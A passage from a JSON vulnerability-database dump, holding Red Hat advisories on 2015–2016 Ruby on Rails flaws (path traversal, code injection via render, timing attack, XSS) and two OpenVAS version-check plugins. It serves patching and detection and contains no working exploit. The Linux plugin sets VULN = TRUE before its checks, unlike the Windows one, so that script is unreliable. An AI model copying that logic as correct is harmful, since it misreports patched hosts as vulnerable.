a\nremote attacker to determine valid user names and passwords using a timing\nattack. (CVE-2015-7576)\n\nThe following issue was corrected in rubygem-activerecord:\n\nA flaw was found in the Active Record component's handling of nested\nattributes in combination with the destroy flag. An attacker could possibly\nuse this flaw to set attributes to invalid values or clear all attributes.\n(CVE-2015-7577)\n\nRed Hat would like to thank the Ruby on Rails project for reporting these\nissues. Upstream acknowledges John Poulin as the original reporter of\nCVE-2016-0752, Jyoti Singh and Tobias Kraze (makandra) as original\nreporters of CVE-2016-2097, Tobias Kraze (makandra) and joernchen\n(Phenoelit) as original reporters of CVE-2016-2098, Aaron Patterson (Red\nHat) as the original reporter of CVE-2016-0751, Daniel Waterworth as the\noriginal reporter of CVE-2015-7576, and Justin Coyne as the original\nreporter of CVE-2015-7577.\n\nAll ruby193 collection rubygem-actionpack and rubygem-activerecord packages\nusers are advised to upgrade to these updated packages, which contain\nbackported patches to correct these issues. All running applications using\nthe ruby193 collection must be restarted for this update to take effect.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-03-15T00:00:00", "type": "redhat", "title": "(RHSA-2016:0455) Important: ruby193 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7576", "CVE-2015-7577", "CVE-2016-0751", "CVE-2016-0752", "CVE-2016-2097", "CVE-2016-2098"], "modified": "2018-06-12T21:28:20", "id": "RHSA-2016:0455", "href": "https://access.redhat.com/errata/RHSA-2016:0455", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-19T20:39:46", "description": "The ror40 collection provides Ruby on Rails version 4.0. Ruby on Rails is\na model-view-controller (MVC) framework for web application development.\n\nThe following issues were corrected in rubygem-actionpack:\n\nMultiple directory traversal flaws were found in the way the Action View\ncomponent searched for templates for rendering. If an application passed\nuntrusted input to the 'render' method, a remote, unauthenticated attacker\ncould use these flaws to render unexpected files and, possibly, execute\narbitrary code. (CVE-2016-0752, CVE-2016-2097)\n\nA code injection flaw was found in the way the Action View component\nsearched for templates for rendering. If an application passed untrusted\ninput to the 'render' method, a remote, unauthenticated attacker could use\nthis flaw to execute arbitrary code. (CVE-2016-2098)\n\nA flaw was found in the way the Action Pack component performed MIME type\nlookups. Since queries were cached in a global cache of MIME types, an\nattacker could use this flaw to grow the cache indefinitely, potentially\nresulting in a denial of service. (CVE-2016-0751)\n\nA flaw was found in the Action Pack component's caching of controller\nreferences. An attacker could use this flaw to cause unbounded memory\ngrowth, potentially resulting in a denial of service. (CVE-2015-7581)\n\nA flaw was found in the way the Action Controller component compared user\nnames and passwords when performing HTTP basic authentication. Time taken\nto compare strings could differ depending on input, possibly allowing a\nremote attacker to determine valid user names and passwords using a timing\nattack. (CVE-2015-7576)\n\nThe following issue was corrected in rubygem-activerecord:\n\nA flaw was found in the Active Record component's handling of nested\nattributes in combination with the destroy flag. An attacker could possibly\nuse this flaw to set attributes to invalid values or clear all attributes.\n(CVE-2015-7577)\n\nRed Hat would like to thank the Ruby on Rails project for reporting these\nissues. Upstream acknowledges John Poulin as the original reporter of\nCVE-2016-0752, Jyoti Singh and Tobias Kraze (makandra) as original\nreporters of CVE-2016-2097, Tobias Kraze (makandra) and joernchen\n(Phenoelit) as original reporters of CVE-2016-2098, Aaron Patterson (Red\nHat) as the original reporter of CVE-2016-0751, Daniel Waterworth as the\noriginal reporter of CVE-2015-7576, and Justin Coyne as the original\nreporter of CVE-2015-7577.\n\nAll ror40 collection rubygem-actionpack and rubygem-activerecord packages\nusers are advised to upgrade to these updated packages, which contain\nbackported patches to correct these issues. All running applications using\nthe ror40 collection must be restarted for this update to take effect.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-03-15T00:00:00", "type": "redhat", "title": "(RHSA-2016:0454) Important: ror40 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7576", "CVE-2015-7577", "CVE-2015-7581", "CVE-2016-0751", "CVE-2016-0752", "CVE-2016-2097", "CVE-2016-2098"], "modified": "2018-06-12T21:28:18", "id": "RHSA-2016:0454", "href": "https://access.redhat.com/errata/RHSA-2016:0454", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-19T20:39:56", "description": "The rh-ror41 collection provides Ruby on Rails version 4.1. Ruby on Rails\nis a model-view-controller (MVC) framework for web application development.\n\nThe following issues were corrected in rubygem-actionview:\n\nA directory traversal flaw was found in the way the Action View component\nsearched for templates for rendering. If an application passed untrusted\ninput to the 'render' method, a remote, unauthenticated attacker could use\nthis flaw to render unexpected files and, possibly, execute arbitrary code.\n(CVE-2016-2097)\n\nA code injection flaw was found in the way the Action View component\nsearched for templates for rendering. If an application passed untrusted\ninput to the 'render' method, a remote, unauthenticated attacker could use\nthis flaw to execute arbitrary code. (CVE-2016-2098)\n\nRed Hat would like to thank the Ruby on Rails project for reporting these\nissues. Upstream acknowledges Jyoti Singh and Tobias Kraze (makandra) as\noriginal reporters of CVE-2016-2097, and Tobias Kraze (makandra) and\njoernchen (Phenoelit) as original reporters of CVE-2016-2098.\n\nAll rh-ror41 collection rubygem-actionview packages users are advised to\nupgrade to these updated packages, which contain backported patches to\ncorrect these issues. All running applications using the rh-ror41\ncollection must be restarted for this update to take effect.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "baseScore": 7.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.4}, "published": "2016-03-15T00:00:00", "type": "redhat", "title": "(RHSA-2016:0456) Important: rh-ror41 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-2097", "CVE-2016-2098"], "modified": "2018-06-12T21:28:26", "id": "RHSA-2016:0456", "href": "https://access.redhat.com/errata/RHSA-2016:0456", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-19T20:37:58", "description": "The rh-ror41 collection provides Ruby on Rails version 4.1. Ruby on Rails\nis a model-view-controller (MVC) framework for web application development.\n\nThe following issue was corrected in rubygem-actionpack and\nrubygem-actionview:\n\nA directory traversal flaw was found in the way the Action View component\nsearched for templates for rendering. If an application passed untrusted\ninput to the 'render' method, a remote, unauthenticated attacker could use\nthis to render unexpected files and, possibly, execute arbitrary code.\n(CVE-2016-0752)\n\nThe following issues were corrected in rubygem-actionpack:\n\nA flaw was found in the way the Action Pack component performed MIME type\nlookups. Since queries were cached in a global cache of MIME types, an\nattacker could use this flaw to grow the cache indefinitely, potentially\nresulting in a denial of service. (CVE-2016-0751)\n\nA flaw was found in the Action Pack component's caching of controller\nreferences. An attacker could use this flaw to cause unbounded memory\ngrowth, potentially resulting in a denial of service. (CVE-2015-7581)\n\nA flaw was found in the way the Action Controller component compared user\nnames and passwords when performing HTTP basic authentication. Time taken\nto compare strings could differ depending on input, possibly allowing a\nremote attacker to determine valid user names and passwords using a timing\nattack. (CVE-2015-7576)\n\nThe following issue was corrected in rubygem-activerecord:\n\nA flaw was found in the Active Record component's handling of nested\nattributes in combination with the destroy flag. An attacker could possibly\nuse this flaw to set attributes to invalid values or clear all attributes.\n(CVE-2015-7577)\n\nThe following issue was corrected in rubygem-activemodel and\nrubygem-activerecord:\n\nA flaw was found in the way the Active Model based models processed\nattributes. An attacker with the ability to pass arbitrary attributes to\nmodels could possibly use this flaw to bypass input validation.\n(CVE-2016-0753)\n\nRed Hat would like to thank the Ruby on Rails project for reporting these\nissues. Upstream acknowledges John Poulin as the original reporter of\nCVE-2016-0752, Aaron Patterson of Red Hat as the original reporter of\nCVE-2016-0751, Daniel Waterworth as the original reporter of CVE-2015-7576,\nJustin Coyne as the original reporter of CVE-2015-7577, and John Backus\nfrom BlockScore as the original reporter of CVE-2016-0753.\n\nAll rh-ror41 collection rubygem-actionpack, rubygem-actionview,\nrubygem-activemodel, and rubygem-activerecord packages users are advised to\nupgrade to these updated packages, which contain backported patches to\ncorrect these issues. All running applications using the rh-ror41\ncollection must be restarted for this update to take effect.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-02-24T00:00:00", "type": "redhat", "title": "(RHSA-2016:0296) Important: rh-ror41 security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7576", "CVE-2015-7577", "CVE-2015-7581", "CVE-2016-0751", "CVE-2016-0752", "CVE-2016-0753"], "modified": "2018-06-12T21:28:22", "id": "RHSA-2016:0296", "href": "https://access.redhat.com/errata/RHSA-2016:0296", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-10-19T20:35:42", "description": "Ruby on Rails is a model-view-controller (MVC) framework for web application development. Action Pack implements the controller and the view components.\n\nSecurity Fix(es):\n\n* It was discovered that Action View tag helpers did not escape quotes when using strings declared as HTML safe as attribute values. A remote attacker could use this flaw to conduct a cross-site scripting (XSS) attack. (CVE-2016-6316)\n\nRed Hat would like to thank the Ruby on Rails project for reporting this issue. Upstream acknowledges Andrew Carpenter (Critical Juncture) as the original reporter.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 2.7}, "published": "2016-09-13T09:51:16", "type": "redhat", "title": "(RHSA-2016:1857) Moderate: ror40-rubygem-actionpack security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-6316"], "modified": "2018-06-12T21:28:24", "id": "RHSA-2016:1857", "href": "https://access.redhat.com/errata/RHSA-2016:1857", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-10-19T20:37:53", "description": "Ruby on Rails is a model-view-controller (MVC) framework for web application development. Action Pack implements the controller and the view components.\n\nSecurity Fix(es):\n\n* It was discovered that Action View tag helpers did not escape quotes when using strings declared as HTML safe as attribute values. A remote attacker could use this flaw to conduct a cross-site scripting (XSS) attack. (CVE-2016-6316)\n\nRed Hat would like to thank the Ruby on Rails project for reporting this issue. Upstream acknowledges Andrew Carpenter (Critical Juncture) as the original reporter.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 2.7}, "published": "2016-09-13T09:51:35", "type": "redhat", "title": "(RHSA-2016:1858) Moderate: ruby193-rubygem-actionpack security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-6316"], "modified": "2018-06-12T21:28:26", "id": "RHSA-2016:1858", "href": "https://access.redhat.com/errata/RHSA-2016:1858", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-10-19T20:36:26", "description": "Ruby on Rails is a model-view-controller (MVC) framework for web application development. Action View implements the view component.\n\nSecurity Fix(es):\n\n* It was discovered that Action View tag helpers did not escape quotes when using strings declared as HTML safe as attribute values. A remote attacker could use this flaw to conduct a cross-site scripting (XSS) attack. (CVE-2016-6316)\n\nRed Hat would like to thank the Ruby on Rails project for reporting this issue. Upstream acknowledges Andrew Carpenter (Critical Juncture) as the original reporter.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 2.7}, "published": "2016-09-13T09:50:58", "type": "redhat", "title": "(RHSA-2016:1856) Moderate: rh-ror41-rubygem-actionview security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-6316"], "modified": "2018-06-12T21:28:18", "id": "RHSA-2016:1856", "href": "https://access.redhat.com/errata/RHSA-2016:1856", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-10-21T04:46:32", "description": "Ruby on Rails is a model-view-controller (MVC) framework for web application development. Action View implements the view component, and Active Record implements the model component.\n\nSecurity Fix(es) in rubygem-actionview:\n\n* It was discovered that Action View tag helpers did not escape quotes when using strings declared as HTML safe as attribute values. A remote attacker could use this flaw to conduct a cross-site scripting (XSS) attack. (CVE-2016-6316)\n\nSecurity Fix(es) in rubygem-activerecord:\n\n* A flaw was found in the way Active Record handled certain special values in dynamic finders and relations. If a Ruby on Rails application performed JSON parameter parsing, a remote attacker could possibly manipulate search conditions in SQL queries generated by the application. (CVE-2016-6317)\n\nRed Hat would like to thank the Ruby on Rails project for reporting these issues. Upstream acknowledges Andrew Carpenter (Critical Juncture) as the original reporter of CVE-2016-6316; and joernchen (Phenoelit) as the original reporter of CVE-2016-6317.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-09-13T09:49:49", "type": "redhat", "title": "(RHSA-2016:1855) Moderate: rh-ror42 security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-6316", "CVE-2016-6317"], "modified": "2018-04-23T07:41:48", "id": "RHSA-2016:1855", "href": "https://access.redhat.com/errata/RHSA-2016:1855", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "openvas": [{"lastseen": "2020-07-21T21:52:48", "description": "This host is running Ruby on Rails and is\n prone to multiple vulnerabilities.", "cvss3": {}, "published": "2016-10-17T00:00:00", "type": "openvas", "title": "Ruby on Rails Multiple Vulnerabilities-01 Oct16 (Windows)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7576", "CVE-2016-0751", "CVE-2016-0752"], "modified": "2020-07-14T00:00:00", "id": "OPENVAS:1361412562310809356", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310809356", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ruby on Rails Multiple Vulnerabilities-01 Oct16 (Windows)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:rubyonrails:rails\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.809356\");\n script_version(\"2020-07-14T14:33:06+0000\");\n script_cve_id(\"CVE-2016-0752\", \"CVE-2016-0751\", \"CVE-2015-7576\");\n script_bugtraq_id(81801, 81800, 81803);\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"2020-07-14 14:33:06 +0000 (Tue, 14 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-10-17 18:48:40 +0530 (Mon, 17 Oct 2016)\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_name(\"Ruby on Rails Multiple Vulnerabilities-01 Oct16 (Windows)\");\n\n script_tag(name:\"summary\", value:\"This host is running Ruby on Rails and is\n prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to\n\n - Directory traversal vulnerability in Action View.\n\n - The script 'actionpack/lib/action_dispatch/http/mime_type.rb' does not properly\n restrict use of the MIME type cache.\n\n - The http_basic_authenticate_with method in\n 'actionpack/lib/action_controller/metal/http_authentication.rb' does not use a\n constant-time algorithm for verifying credentials.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow a remote\n attacker to read arbitrary files by leveraging an application's unrestricted use\n of the render method, to cause a denial of service.\");\n\n script_tag(name:\"affected\", value:\"Ruby on Rails before 3.2.22.1,\n Ruby on Rails 4.0.x and 4.1.x before 4.1.14.1 and\n Ruby on Rails 4.2.x before 4.2.5.1 on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Ruby on Rails 3.2.22.1 or 4.1.14.1 or\n 4.2.5.1, or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://www.openwall.com/lists/oss-security/2016/01/25/10\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_rails_consolidation.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"rails/detected\", \"Host/runs_windows\");\n exit(0);\n}\n\ninclude( \"version_func.inc\" );\ninclude( \"host_details.inc\" );\n\nif( isnull( port = get_app_port( cpe: CPE ) ) )\n exit( 0 );\n\nif( ! infos = get_app_version_and_location( cpe: CPE, port: port, exit_no_version: TRUE ) )\n exit( 0 );\n\nversion = infos[\"version\"];\nlocation = infos[\"location\"];\n\nVULN = FALSE;\n\nif( version_is_less( version: version, test_version: \"3.2.22.1\" ) )\n{\n fix = \"3.2.22.1\";\n VULN = TRUE;\n}\n\nelse if( version =~ \"^(4\\.)\" )\n{\n if( version_is_less( version: version, test_version: \"4.1.14.1\" ) )\n {\n fix = \"4.1.14.1\";\n VULN = TRUE;\n }\n}\n\nif( version =~ \"^(4\\.2)\" )\n{\n if( version_is_less( version: version, test_version: \"4.2.5.1\" ) )\n {\n fix = \"4.2.5.1\";\n VULN = TRUE;\n }\n}\n\nif( VULN )\n{\n report = report_fixed_ver( installed_version: version, fixed_version: fix, install_path: location );\n security_message( data:report, port: port );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-07-21T21:55:49", "description": "This host is running Ruby on Rails and is\n prone to multiple vulnerabilities.", "cvss3": {}, "published": "2016-10-17T00:00:00", "type": "openvas", "title": "Ruby on Rails Multiple Vulnerabilities-01 Oct16 (Linux)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7576", "CVE-2016-0751", "CVE-2016-0752"], "modified": "2020-07-14T00:00:00", "id": "OPENVAS:1361412562310809357", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310809357", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ruby on Rails Multiple Vulnerabilities-01 Oct16 (Linux)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:rubyonrails:rails\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.809357\");\n script_version(\"2020-07-14T14:33:06+0000\");\n script_cve_id(\"CVE-2016-0752\", \"CVE-2016-0751\", \"CVE-2015-7576\");\n script_bugtraq_id(81801, 81800, 81803);\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"2020-07-14 14:33:06 +0000 (Tue, 14 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-10-17 18:48:40 +0530 (Mon, 17 Oct 2016)\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n script_name(\"Ruby on Rails Multiple Vulnerabilities-01 Oct16 (Linux)\");\n\n script_tag(name:\"summary\", value:\"This host is running Ruby on Rails and is\n prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to,\n\n - The directory traversal vulnerability in Action View.\n\n - The script 'actionpack/lib/action_dispatch/http/mime_type.rb' does not properly\n restrict use of the MIME type cache.\n\n - The http_basic_authenticate_with method in\n 'actionpack/lib/action_controller/metal/http_authentication.rb' does not use a\n constant-time algorithm for verifying credentials.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow a remote\n attacker to read arbitrary files by leveraging an application's unrestricted use\n of the render method, to cause a denial of service.\");\n\n script_tag(name:\"affected\", value:\"Ruby on Rails before 3.2.22.1,\n Ruby on Rails 4.0.x and 4.1.x before 4.1.14.1 and\n Ruby on Rails 4.2.x before 4.2.5.1 on Linux.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Ruby on Rails 3.2.22.1 or\n 4.1.14.1 or 4.2.5.1, or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://www.openwall.com/lists/oss-security/2016/01/25/10\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_rails_consolidation.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"rails/detected\", \"Host/runs_unixoide\");\n exit(0);\n}\n\ninclude( \"version_func.inc\" );\ninclude( \"host_details.inc\" );\n\nif( isnull( port = get_app_port( cpe: CPE ) ) )\n exit( 0 );\n\nif( ! infos = get_app_version_and_location( cpe: CPE, port: port, exit_no_version: TRUE ) )\n exit( 0 );\n\nversion = infos[\"version\"];\nlocation = infos[\"location\"];\n\nVULN = TRUE;\n\nif( version_is_less( version: version, test_version: \"3.2.22.1\" ) )\n{\n fix = \"3.2.22.1\";\n VULN = TRUE;\n}\n\nelse if( version =~ \"^(4\\.)\" )\n{\n if( version_is_less( version: version, test_version: \"4.1.14.1\" ) )\n {\n fix = \"4.1.14.1\";\n VULN = TRUE;\n }\n}\n\nif( version =~ \"^(4\\.2)\" )\n{\n if( version_is_less( version: version, test_version: \"4.2.5.1\" ) )\n {\n fix = \"4.2.5.1\";\n VULN = TRUE;\n }\n}\n\nif( VULN )\n{\n report = report_fixed_ver( installed_version: version, fixed_version: fix, install_path: location );\n security_message( data:report, port: port);\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2017-07-24T12:54:04", "description": "Two vulnerabilities have been discovered\nin Rails, a web application framework written in Ruby. Both vulnerabilities affect\nAction Pack, which handles the web requests for Rails.\n\nCVE-2016-2097Crafted requests to Action View, one of the components of Action Pack,\nmight result in rendering files from arbitrary locations, including\nfiles beyond the application", "cvss3": {}, "published": "2016-03-09T00:00:00", "type": "openvas", "title": "Debian Security 